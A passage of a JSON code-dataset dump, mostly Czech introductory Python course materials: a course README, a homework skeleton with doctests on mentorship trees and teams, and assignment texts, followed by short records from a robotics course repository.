7.2.2, 7.2.3, (7.1.3) |\n| 8 | [Datové struktury](http://www.fi.muni.cz/IB111/sbirka/09-datove_struktury.html) | 9.1.1, 9.2.2, 9.3.2, tic-tac-toe |\n| 9 | [Rekurze](http://www.fi.muni.cz/IB111/sbirka/08-rekurze.html) | 8.1.1, 8.1.2, 8.1.4, 8.2.1, 8.3.1, 8.3.2, 8.3.3 |\n| 10 | [Objekty](https://www.fi.muni.cz/IB111/sbirka/10-objekty_a_tridy.html) | 10.1.2, 10.1.3, 10.2.1, 10.2.7 |\n| 11 | [Zpracování textu](./week11/week11.py) | 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 11.7 |\n| 12 | Vnitrosemestrální test | (druhý) |\n| 13 | [Bitmapová grafika](https://www.fi.muni.cz/IB111/sbirka/12-bitmapova_grafika.html) | 12.1.1, 12.1.6, 12.2.1, 12.2.3, 12.2.4., 12.1.7, (12.1.9, 12.1.10) |\n\nDomácí úlohy\n------------\n\nTabulka odkazuje na zadání domácích úloh a uvádí termín odevzdání (soft deadline).\nPro případ nouze bude každou domácí úlohu možné odevzdat ještě během týdne následujícího po tomto termínu.\n\n| | Zadání | Odevzdání |\n| --- | --- | --- |\n| 1 | [Posloupnosti a obrázky](homeworks/homework_01.md) | neděle 1. 10. |\n| 2 | [1D hra](homeworks/homework_02.md) | neděle 15. 10. |\n| 3 | [2D hra](homeworks/homework_03.md) | neděle 12. 11. |\n| 4 | [Objekty](homeworks/homework_04.md) | neděle 3. 12. |\n| **5** | **[Text a obrázky](homeworks/homework_05.md)** | **neděle 17. 12.** |\n\nTutoriály, kurzy a hry\n----------------------\n* [Tutoriál z dokumentace Pythonu](https://docs.python.org/3/tutorial/index.html)\n* [Česká učebnice programování v Pythonu](http://howto.py.cz/index.htm)\n* [An Introduction to Interactive Programming in Python (Rice University)](https://www.coursera.org/course/interactivepython)\n* [CheckiO - učení (počítačovou) hrou](http://www.checkio.org/)\n* [Code Combat](http://codecombat.com/)\n\nÚlohy k procvičování\n--------------------\n* [Seznam úloh na 1. vnitro](https://docs.google.com/document/d/1j6eVw1q_UNWmbDjoUUketnJ0QoJdHz5pRoSjR_YHiyo)\n* [Programátorská cvičebnice](http://www.radekpelanek.cz/?progcvic)\n* [HackerRank – programming challanges](https://www.hackerrank.com)\n* [Problem Solving Tutor](http://tutor.fi.muni.cz/)\n* [Python Challange](http://www.pythonchallenge.com/)\n* [Project Euler](http://projecteuler.net/)\n\nMotivace\n--------\n* [Motivační video o programování](https://www.youtube.com/watch?v=nKIu9yen5nc)\n* [What is Programming? (Khan Academy)](https://www.khanacademy.org/computing/cs/programming/intro-to-programming/v/programming-intro)\n* [Výroky slavných osobností o programování](http://code.org/quotes)\n"
},
{
"alpha_fraction": 0.5507215261459351,
"alphanum_fraction": 0.5741534233093262,
"avg_line_length": 26.393346786499023,
"blob_id": "210441140edd4c41c580c421b05aab9e4b7819cb",
"content_id": "fec647084db358e10b242425ae98c6b4b651f827",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13998,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 511,
"path": "/homeworks/homework_04.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "class Person:\n \"\"\"Represents a member of the association.\n\n Attributes:\n name: string\n year_of_birth: int\n degree: one of 'bc', 'mgr', 'phd'\n mentor: another Person who is the mentor of this person\n mentees: list of Persons, direct mentees of this person\n \"\"\"\n def __init__(self, name, year_of_birth, degree):\n \"\"\"Initialize new Person object.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> martin.name\n 'Martin'\n >>> martin.year_of_birth\n 1991\n >>> martin.degree\n 'phd'\n \"\"\"\n # TODO\n pass\n\n def describe(self):\n \"\"\"Return string representation of this person.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> martin.describe()\n 'Martin (1991)'\n \"\"\"\n # TODO\n pass\n\n\nclass Team:\n \"\"\"Represents a group of people working together on one event.\n\n Attributes:\n name: string, name of the event\n members: list of Persons working on this event\n \"\"\"\n def __init__(self, name):\n \"\"\"Initialize new Team object.\n\n >>> team = Team('InterJeLen')\n >>> team.name\n 'InterJeLen'\n >>> team.members\n []\n \"\"\"\n # TODO\n pass\n\n def add_member(self, member):\n \"\"\"Add new member to this team.\n\n >>> team = Team('InterJeLen')\n >>> dominika = Person('Dominika', 1995, 'bc')\n >>> team.add_member(dominika)\n >>> [member.name for member in team.members]\n ['Dominika']\n \"\"\"\n # TODO\n pass\n\n\ndef create_mentorship(mentor, mentee):\n \"\"\"Create new relationship between a mentor and a mentee.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> create_mentorship(martin, tom)\n >>> tom.mentor.name\n 'Martin'\n >>> [mentee.name for mentee in martin.mentees]\n ['Tom']\n \"\"\"\n # TODO\n pass\n\n\ndef get_longest_name(people):\n \"\"\"Return longest name among all people.\n\n Args:\n people: dictionary mapping names to Persons\n Returns:\n the longest name (string)\n\n >>> people = {}\n >>> people['martin'] = Person('Martin', 1991, 'phd')\n >>> people['honza'] = Person('Honza', 1995, 'bc')\n >>> get_longest_name(people)\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef get_founder(people):\n \"\"\"Return a person without a mentor.\n\n In the association, there should be only one person without a mentor, this\n person is called `founder`. This function finds and returns the founder.\n\n Args:\n people: dictionary mapping names to Persons\n\n Returns:\n Person without a mentor\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> create_mentorship(martin, tom)\n >>> people = {'martin': martin, 'tom': tom}\n >>> founder = get_founder(people)\n >>> founder.name\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef print_mentorship_tree(people):\n \"\"\"Print tree of mentorship, see the example below.\n Indents each level by 2 spaces. Mentees of a mentor are ordered by names.\n\n Hint:\n Use `get_founder` and `print_mentorship_subtree` helper functions.\n Args:\n people: dictionary mapping names to Person objects\n\n >>> people = {}\n >>> people['Martin'] = Person('Martin', 1991, 'phd')\n >>> people['Lukas'] = Person('Lukas', 1991, 'phd')\n >>> people['Tom'] = Person('Tom', 1993, 'mgr')\n >>> people['Honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['Martin'], people['Tom'])\n >>> create_mentorship(people['Tom'], people['Honza'])\n >>> create_mentorship(people['Martin'], people['Lukas'])\n >>> print_mentorship_tree(people)\n Martin (1991)\n Lukas (1991)\n Tom (1993)\n Honza (1995)\n \"\"\"\n # TODO\n pass\n\n\ndef print_mentorship_subtree(person, level=0):\n \"\"\"Print person with all transitive mentees as a tree.\n Indents each level by 2 spaces. Mentees of a mentor are ordered by names.\n\n Args:\n person: Person at the root of the printed tree\n level: number of double-spaces to add before each printed line\n (level=0 for 0 space, level=1 for 2 spaces, etc.)\n\n >>> people = {}\n >>> people['tom'] = Person('Tom', 1993, 'mgr')\n >>> people['honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['tom'], people['honza'])\n >>> print_mentorship_subtree(people['tom'], level=1)\n Tom (1993)\n Honza (1995)\n \"\"\"\n # TODO\n pass\n\n\ndef count_transitive_mentees(person):\n \"\"\"Return number of transitive mentees of given person.\n\n Transitive mentees are all person's mentees, mentees of these mentees, etc.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> lukas = Person('Lukas', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, lukas)\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> count_transitive_mentees(martin)\n 3\n >>> count_transitive_mentees(tom)\n 1\n >>> count_transitive_mentees(honza)\n 0\n \"\"\"\n # TODO\n pass\n\n\ndef count_transitive_mentees_with_degree(person, degree):\n \"\"\"Return number of transitive mentees who persue given degree.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> count_transitive_mentees_with_degree(martin, 'bc')\n 1\n \"\"\"\n # TODO\n pass\n\n\ndef get_transitive_mentors(person):\n \"\"\"Return list with a person's mentor, mentor of this mentor, etc.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> [person.name for person in get_transitive_mentors(honza)]\n ['Tom', 'Martin']\n \"\"\"\n # TODO\n pass\n\n\ndef get_person_with_most_mentees(people):\n \"\"\"Return the person who has most mentees (counting direct mentees only).\n\n Args:\n people: dictionary mapping names to Persons\n\n >>> people = {}\n >>> people['Martin'] = Person('Martin', 1991, 'phd')\n >>> people['Lukas'] = Person('Lukas', 1991, 'phd')\n >>> people['Tom'] = Person('Tom', 1993, 'mgr')\n >>> people['Honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['Martin'], people['Lukas'])\n >>> create_mentorship(people['Martin'], people['Tom'])\n >>> create_mentorship(people['Tom'], people['Honza'])\n >>> get_person_with_most_mentees(people).name\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef get_team_year_of_birth_median(team):\n \"\"\"Return median year of birth of team members.\n\n If the team has even number of members,\n return the smaller of the two years in the middle.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('a', 1990, 'phd'))\n >>> team.add_member(Person('b', 1995, 'bc'))\n >>> team.add_member(Person('c', 1996, 'bc'))\n >>> get_team_year_of_birth_median(team)\n 1995\n >>> team.add_member(Person('d', 1996, 'bc'))\n >>> get_team_year_of_birth_median(team)\n 1995\n \"\"\"\n # TODO\n pass\n\n\ndef get_most_common_degree_in_team(team):\n \"\"\"Return degree which occurs most times in the team.\n\n If there are multiple degrees which appears most times, return any of them.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('a', 1990, 'phd'))\n >>> team.add_member(Person('b', 1995, 'bc'))\n >>> team.add_member(Person('c', 1996, 'bc'))\n >>> get_most_common_degree_in_team(team)\n 'bc'\n \"\"\"\n # TODO\n pass\n\n\ndef print_team_info(team):\n \"\"\"Prints name, members, median year of birth and the most common degree.\n\n Members are printed from the oldest to the youngest.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('Petra', 1995, 'bc'))\n >>> team.add_member(Person('Pavla', 1996, 'bc'))\n >>> team.add_member(Person('Matej', 1990, 'phd'))\n >>> print_team_info(team)\n ----------------\n Team: InterJeLen\n ----------------\n Matej (1990)\n Petra (1995)\n Pavla (1996)\n --\n median year of birth: 1995\n most common degree: bc\n \"\"\"\n # TODO\n pass\n\n\ndef print_all_teams_info(teams):\n \"\"\"Print info about all given teams. Teams are ordered by names.\n\n >>> teams = {'x': Team('x'), 'y': Team('y')}\n >>> teams['x'].add_member(Person('a', 1995, 'bc'))\n >>> teams['y'].add_member(Person('b', 1996, 'bc'))\n >>> print_all_teams_info(teams)\n -------\n Team: x\n -------\n a (1995)\n --\n median year of birth: 1995\n most common degree: bc\n -------\n Team: y\n -------\n b (1996)\n --\n median year of birth: 1996\n most common degree: bc\n \"\"\"\n # TODO\n pass\n\n\ndef get_common_members_names(team1, team2):\n \"\"\"Return set of persons' names that are members of both teams.\n\n Return:\n set of persons' names\n\n >>> intersob = Team('InterSoB')\n >>> interlos = Team('InterLoS')\n >>> a = Person('a', 1995, 'bc')\n >>> b = Person('b', 1995, 'bc')\n >>> c = Person('c', 1995, 'bc')\n >>> intersob.members = [a, b]\n >>> interlos.members = [b, c]\n >>> get_common_members_names(intersob, interlos)\n {'b'}\n \"\"\"\n # TODO\n pass\n\n\ndef get_common_teams_names(person1, person2, teams):\n \"\"\"Return set of teams (their names) in which are both persons.\n\n Args:\n person1: Person\n person2: Person\n teams: dictionary mapping team names to Team objects\n\n Return:\n set of teams' names\n\n >>> teams = {'x': Team('x'), 'y': Team('y'), 'z': Team('z')}\n >>> a = Person('a', 1995, 'bc')\n >>> b = Person('b', 1995, 'bc')\n >>> teams['x'].add_member(a)\n >>> teams['y'].add_member(a)\n >>> teams['y'].add_member(b)\n >>> teams['z'].add_member(b)\n >>> get_common_teams_names(a, b, teams)\n {'y'}\n \"\"\"\n # TODO\n pass\n\n\ndef process_person_line(line, people):\n \"\"\"Parse one line of input file containg info about a person.\n \"\"\"\n name, year, degree = line.split(',')\n people[name] = Person(name, int(year), degree)\n\n\ndef process_mentor_line(line, people):\n \"\"\"Parse one line of input file containg info about a mentorship.\n\n >>> petra = Person('Petra', 1993, 'mgr')\n >>> pavla = Person('Pavla', 1995, 'bc')\n >>> people = {'Petra': petra, 'Pavla': pavla}\n >>> process_mentor_line('Petra->Pavla', people)\n >>> pavla.mentor.name\n 'Petra'\n >>> petra.mentees == [pavla]\n True\n \"\"\"\n # TODO\n pass\n\n\ndef process_team_line(line, people, teams):\n \"\"\"Parse one line of input file containg info about a team.\n\n >>> petra = Person('Petra', 1995, 'bc')\n >>> pavla = Person('Pavla', 1995, 'bc')\n >>> people = {'Petra': petra, 'Pavla': pavla}\n >>> teams = {}\n >>> process_team_line('InterJeLen:Petra,Pavla', people, teams)\n >>> teams['InterJeLen'].members == [petra, pavla]\n True\n \"\"\"\n # TODO\n pass\n\n\ndef read_file(filename):\n \"\"\"Read file and return list of lines. Remove new lines.\n\n >>> lines = read_file('members.txt')\n >>> len(lines)\n 34\n >>> lines[:3]\n ['=== People ===', 'Martin,1991,phd', 'Maara,1989,phd']\n \"\"\"\n # TODO\n pass\n\n\ndef read_data(filename='members.txt'):\n \"\"\"Read and parse data in given filename; return people and teams.\n Function expects data in the same format as in example 'members.txt' file.\n No input data validation is performed.\n\n Return:\n (people, teams): dictionaries mapping names to Person/Team objects\n\n >>> people, teams = read_data()\n >>> len(people)\n 14\n >>> people['Tyna'].describe()\n 'Tyna (1993)'\n >>> len(teams)\n 4\n >>> print_team_info(teams['InterSoB'])\n --------------\n Team: InterSoB\n --------------\n Lukas (1991)\n Tom (1993)\n Radka (1994)\n Dominika (1995)\n --\n median year of birth: 1993\n most common degree: mgr\n \"\"\"\n people, teams = {}, {}\n lines = read_file(filename)\n mode = None # current section of the file: 'people', 'mentors' or 'teams'\n for line in lines:\n if line == '=== People ===':\n mode = 'people'\n elif line == '=== Mentors ===':\n mode = 'mentors'\n elif line == '=== Teams ===':\n mode = 'teams'\n elif mode == 'people':\n process_person_line(line, people)\n elif mode == 'mentors':\n process_mentor_line(line, people)\n elif mode == 'teams':\n process_team_line(line, people, teams)\n else:\n raise ValueError('Invalid state when reading file.')\n return people, teams\n\n\ndef main():\n \"\"\"Read data about members of the association and print some info.\n \"\"\"\n people, teams = read_data()\n print('longest name:', get_longest_name(people))\n print('founder:', get_founder(people).name)\n print_mentorship_tree(people)\n print('transitive mentees of Lukas:',\n count_transitive_mentees(people['Lukas']))\n print('transitive mgr mentees of Lukas:',\n count_transitive_mentees_with_degree(people['Lukas'], 'mgr'))\n print('transitive mentors of Ondra:',\n [person.name for person in get_transitive_mentors(people['Ondra'])])\n print('person with most mentees:',\n get_person_with_most_mentees(people).name)\n print_all_teams_info(teams)\n print('common members of InterSoB and KSI:',\n get_common_members_names(teams['InterSoB'], teams['KSI']))\n print('common teams of Dominika and Vlada:',\n get_common_teams_names(people['Dominika'], people['Vlada'], teams))\n\n\ndef test():\n \"\"\"Check examples in docstrings.\n\n If the actual output matches the expected output, doesn't print anything.\n Otherwise, it prints an error message showing the mismatch.\n \"\"\"\n import doctest\n doctest.testmod()\n\n\nif __name__ == \"__main__\":\n #main()\n test()\n"
},
{
"alpha_fraction": 0.6975568532943726,
"alphanum_fraction": 0.7287278771400452,
"avg_line_length": 39.931034088134766,
"blob_id": "d5fd261fafe7d8ba479f3bb1e89112b0ad21287f",
"content_id": "9d0940a21944a422327b72627e193eff891c33ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 58,
"path": "/homeworks/homework_02.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 2\n* Termín odevzdání: soft deadline je 15.10., ale odevzdávat můžete až do 22.10.\n* Za úlohu můžete dostat až 25 bodů\n* Budete odevzdávat jeden soubor `homework_02.py` s funkcemi pojmenovanými podle zadání\n* Odevzdávárna [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 2](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw2/)\n* Funkce a proměnné pojmenovávejte výstižně, ale stručně\n* Snažte se držet společného jazyka programátorů (angličtiny) jak v kódu, tak i ve výpisu\n* Komentáře jsou jako sůl. Je potřeba, ale neobraťte tam celou solničku ;)\n* Pracujte samostatně\n\n## Hadi a žebříky\nVaším úkolem bude naprogramovat zjednodušenou verzi Hadů a žebříků ([Snakes and Ladders](https://en.wikipedia.org/wiki/Snakes_and_Ladders)).\n\n### Pravidla:\n* hraje se na hracím plánu délky `length`\n* figurka začíná na jednom z konců\n* háže se standardní šestistěnnou koskou\n* pokud padne 6, tak se háže znovu (stále se počítá jako jeden tah)\n* figurka se posune o součet hodů, ale zůstane stát pokud by se dostala za cíl (tj. musí se trefit přesně)\n* každé `n`-té políčko je had, který figurku posune o `k` políček zpět (pouze jednou za tah)\n\n### Poznámky\n* pro délku hracího plánu `length < 2` nebo pro `n <= 0` funkci skončete a vypište smysluplnou hlášku\n\n### Kostra\n```\nfrom random import randint, random\n\ndef game(length, n, k, output = True):\n pass\n \ndef game_analysis(length, n, k, count):\n pass\n \ndef game_average_length(count):\n pass\n```\n\n### Úkol\n* funkce `game` nasimuluje jednu hru a vrací počet tahů, pokud je parametr `output` roven `True`, pak funkce průběžě vypisuje stav hry (viz níže)\n* funkce `game_analysis` nasimuluje `count` her se zadanými parametry a vrací průměrný počet tahů\n* funkce `game_average_length` nasimuluje `count` her pro kombinace parametrů `length` 10 - 20, `n` 2 - 4 a `k` 1 - 3 a pro každou kombinaci vypíše průměrný počet tahů v nějakém pěkném formátu\n\n### Ukázkový výpis funkce `game`\n```\n>>> game(20, 4, 2)\nTurn 1: 3 -> new position: 3\nTurn 2: 1 -> new position: 2\nTurn 3: 6 3 -> new position: 11\nTurn 4: 5 -> new position: 14\nTurn 5: 4 -> new position: 18\nTurn 6: 3 -> new position: 18\nTurn 7: 2 -> new position: 20\nGame finished at turn 7\n```\n\n### Bonus\nZa tuto úlohu bude možné získat nějaké bonusové body za úpravu první funkce, aby stav hry znázorňovala graficky (pomocí různých znaků).\n"
},
{
"alpha_fraction": 0.719031035900116,
"alphanum_fraction": 0.7544503808021545,
"avg_line_length": 36.84027862548828,
"blob_id": "2d65fff98715007496d1545a21f2fcab45d29a5c",
"content_id": "5a6ea9da352a7f851aafb99b78dc3bf9adef0ae2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5870,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 144,
"path": "/homeworks/homework_04.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 4: Objekty\n* Termín odevzdání: neděle 3. 12 (soft deadline).\n* Pro případ nouze bude odevzdávárna otevřená až do 10. 12. (hard deadline).\n* Odevzdejte jediný soubor `homework_04.py` s implementací požadovaných metod a funkcí.\n* Vyjděte z [připravené kostry](homework_04.py), zachovejte hlavičky funkcí, dokumentační řetězce i testy.\n* Odevzdávárna:\n [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 4](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw4/)\n* Pište přehledný kód, používejte vhodná jména proměnných, odstraňte duplicitní kód.\n* Případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Úlohu vypracujte zcela samostatně.\n* Řešení domácí úlohy si užijte :-)\n\n## Zadání\n\nV souboru [members.txt](members.txt) jsou data o členech fakultního Spolku přátel severské zvěře.\nO každém členovi evidujeme jeho jméno, rok narození a stupeň studia.\n(O jménech můžete předpokládat, že jsou unikátní.)\nKaždý člen spolku, kromě jeho zakladatele, má právě jednoho mentora.\nNapř. řádek `Martin->Tom` vyjadřuje, že Martin je Tomův mentor.\nMentorství tvoří stromovou hierarchii (tj. nejsou tam cykly).\nPoslední částí souboru jsou týmy pro jednotlivé soutěže, které Spolek organizuje.\nKaždý tým má název a seznam členů.\nMůžete předpokládat, že vstupní soubor má přesně takový formát jako ten ukázkový (netřeba ošetřovat prázdné řádky navíc a jiné odchylky od formátu).\n\nVaším úkolem je tento soubor načíst\na vytvořit reprezentaci jednotlivých členů (třída `Person`) a týmů (třída `Team`).\nK reprezentaci kolekcí využijte slovníky mapující jména na objekty,\ntakže např. `people['Martin']` bude odkazovat na objekt třídy `Person` reprezentující Martina.\nKaždý objekt třídy `Person` má kromě jména, roku narození a stupně studia\ntaké mentora a seznam svých mentorovaných (`mentees`).\n\nS členy spolku a týmy pak budeme chtít např.\n najít nejdelší jméno,\n vykreslit strom mentorství,\n či vypsat přehled všech týmů (viz vzorový výstup níže).\nPřipravená kostra obsahuje popis všech požadovaných funkcí včetně vzorového chování\nv tzv. dokumentačních řetězcích (uzavřené do trojitých uvozovek hned za hlavičkou funkce).\n\nNěkteré funkce využívají pojmu *transitive mentors* a *transitive mentees*.\nPokud osoba A má mentora B, B má mentora C, C má mentora D a D žádného mentora nemá (tj. je to zakladatel), pak tranzitivními mentory osoby A jsou B, C i D.\nA naopak, tranzitivními mentorovanými (*transitive mentees*) osoby D\njsou A, B, C (a všichni další mentorovaní těchto osob a jejich mentorovaní, atd.)\n\n\n## Kostra\nVyjděte z [připravené kostry](homework_04.py), zachovejte hlavičky funkcí, dokumentační řetězce i testy.\nZ kostry můžete mazat pouze příkazy `pass` a `TODO` značky -\nty ale smažte až poté, co danou metodu či funkci implementujete.\nPokud některou funkci zvládnete implementovat jen částečně (např. bude fungovat jen pro některé vstupy), tak `TODO` komentář v kódu ponechte a doplňte jej o popis, co už vaše funkce umí a co jí chybí k dokonalosti.\n\nKostra obsahuje funkci `main()`,\nkterá načte soubor a volá implementované funkce pro načtená data,\na funkci `test()`, která ověří, že funkce fungují na ukázkových případech popsaných v dokumentačních řetězcích.\nOdkomentováním volání funkce `test()` na posledním řádku si tak můžete ověřit,\njestli vaše implementace fungují aspoň na ukázkových případech.\n(Pokud ne, tak značku `TODO` u takové funkce neodstraňujte.)\nPodobně si zkontrolujte, zda výstup funkce `main()` odpovídá vzorovému výstupu níže.\n\n## Bodování\nKostra obsahuje 4 metody a 18 funkcí k doplnění (označené pomocí `TODO`).\nZa každou funkční metodu získáte 1 bod, za každou funkci 2 body.\nCelkem tedy můžete získat až 40 bodů.\nPodmínkou k získání plného počtu bodů je kromě funkčnosti také přehledný a čitelný kód.\nOvěřte si i dodržovaní konvencí (jména proměnných, mezery) pomocí pylintu.\n\nPokud některé funkce nezvládnete implementovat,\nzakomentujte před odevzdáním část metody `main` tak, aby byl soubor spustitelný.\n\n## Sebehodnocení\nPřed odevzdáním doplňte na začátek souboru komentář s odhadem získaných bodů.\nVzhledem k tomu, že by počet bodů měl jít přímočaře spočítat z počtu\nzbývajících `TODO`, zkuste případnou odchylku stručně vysvětlit.\n\n\n## Vzorový výstup\n```\nlongest name: Dominika\nfounder: Martin\nMartin (1991)\n Lukas (1991)\n Radka (1994)\n Anicka (1997)\n Dominika (1995)\n Tyna (1993)\n Viki (1995)\n Vlada (1991)\n Maara (1989)\n Jan (1993)\n Tom (1993)\n Honza (1995)\n Ondra (1997)\n Katka (1994)\ntransitive mentees of Lukas: 6\ntransitive mgr mentees of Lukas: 2\ntransitive mentors of Ondra: ['Honza', 'Tom', 'Martin']\nperson with most mentees: Radka\n--------------\nTeam: InterLoS\n--------------\nVlada (1991)\nJan (1993)\nRadka (1994)\nKatka (1994)\nDominika (1995)\n--\nmedian year of birth: 1994\nmost common degree: mgr\n--------------\nTeam: InterSoB\n--------------\nLukas (1991)\nTom (1993)\nRadka (1994)\nDominika (1995)\n--\nmedian year of birth: 1993\nmost common degree: mgr\n---------\nTeam: KSI\n---------\nVlada (1991)\nHonza (1995)\nDominika (1995)\nViki (1995)\nAnicka (1997)\nOndra (1997)\n--\nmedian year of birth: 1995\nmost common degree: bc\n--------------\nTeam: PoznejFI\n--------------\nMaara (1989)\nMartin (1991)\nTom (1993)\nTyna (1993)\nAnicka (1997)\n--\nmedian year of birth: 1993\nmost common degree: bc\ncommon members of InterSoB and KSI: {'Dominika'}\ncommon teams of Dominika and Vlada: {'InterLoS', 'KSI'}\n```\n"
},
{
"alpha_fraction": 0.6545842289924622,
"alphanum_fraction": 0.668443500995636,
"avg_line_length": 31.34482765197754,
"blob_id": "3b00690214d6bfcba64032526f3aca58a236831e",
"content_id": "8a0dfcc63f02365b7b6862f11752bb5e7304dc21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 29,
"path": "/homeworks/homework_03.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "def print_board(state):\n # state - reprezentace stavu hry\n # funkce vypise na obrazovku stav hry v nejake pekne forme\n # nic nevraci\n pass\n\ndef play(rows, columns, player1 = \"human\", player2 = \"human\"):\n # rows - pocet radku hraciho pole (nabyva hodnot >= 1)\n # columns - pocet sloupcu (nabyva hodnot >= 3)\n # player1 / player2 - urcuje, kdo jsou hraci, player1 zacina (nabyva hodnot \"human\", \"computer\")\n # vraci 0 pokud remiza, jinak cislo vyherce\n pass\n\ndef check_win(state):\n # state - reprezentace stavu hry\n # vraci cislo vyherce nebo 0 pokud nikdo nevyhral\n pass\n\ndef human_play(state, number):\n # state - reprezentace stavu hry\n # number - cislo hrace (1 nebo 2)\n # vraci cislo sloupce, ktery hrac vybral\n pass\n \ndef computer_play(state, number):\n # state - reprezentace stavu hry\n # number - cislo hrace (1 nebo 2)\n # vraci cislo sloupce, ktery pocitac vybral\n pass\n"
}
] | 11 |
shehzi001/amr-ss
|
https://github.com/shehzi001/amr-ss
|
83d10106b52a2653abe3d6babad756fcdca7ffb2
|
7668d332e4f4fe31252b8eb36a4cd168c442d946
|
72e4f9b6237069495d547b8c855081db4a65638f
|
refs/heads/master
| 2020-04-12T14:41:25.460665 | 2014-06-24T11:16:03 | 2014-06-24T11:16:03 | 30,924,785 | 0 | 1 | null | 2015-02-17T16:05:31 | 2014-09-06T16:30:46 | 2014-09-06T16:30:46 | null |
[
{
"alpha_fraction": 0.7209302186965942,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 31.25,
"blob_id": "de44b168d2cba9486ffdd2d7e9af5d0e05dfdef5",
"content_id": "da09d69d7db758b4c537190c6c2f1b762c9e480d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 4,
"path": "/README.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "amr-public\n==========\n\nAll manuals and other information can be found in the wiki at https://github.com/brsu-amr/amr-public/wiki\n"
},
{
"alpha_fraction": 0.7025411128997803,
"alphanum_fraction": 0.726457417011261,
"avg_line_length": 28.086956024169922,
"blob_id": "f5542b8d5998ae1c5b28ac96e746b519403eff17",
"content_id": "042401b97bb48c89240fa5506097bb63ec8f0b0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 23,
"path": "/grades/20140524.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1\n* Correct intermediate maps update: 2/2\n* Masking and normalization of occupied regions: 1/1\n* Correct probability-computing function: 2.5/3\n* Rounding error protection: 1/1\n* Proper handling of \"open\" sensor readings: 1/2\n\n_Total:_ 8.5 points\n\nFeedback\n========\n\nYou did not use the provided method to convert coordinates to cell coordinates. \nThe method does a similar thing like what you do but you forgot the lround() step.\n\nThis part of the code seems to be error prone\n```\n if (distance >= max_range) { distance = max_range * 2; }\n```\nYou could have capped the distance instead of changing it. This has a bad effect on the free map.\n"
},
{
"alpha_fraction": 0.6769428253173828,
"alphanum_fraction": 0.6923571228981018,
"avg_line_length": 33.57777786254883,
"blob_id": "5c0057837275c3c0e31b7466d59483f6943ee5b1",
"content_id": "b84219a361c284857602690ddb82b5fbe5d108cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1557,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 45,
"path": "/amr_localization/src/particle_visualizer.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
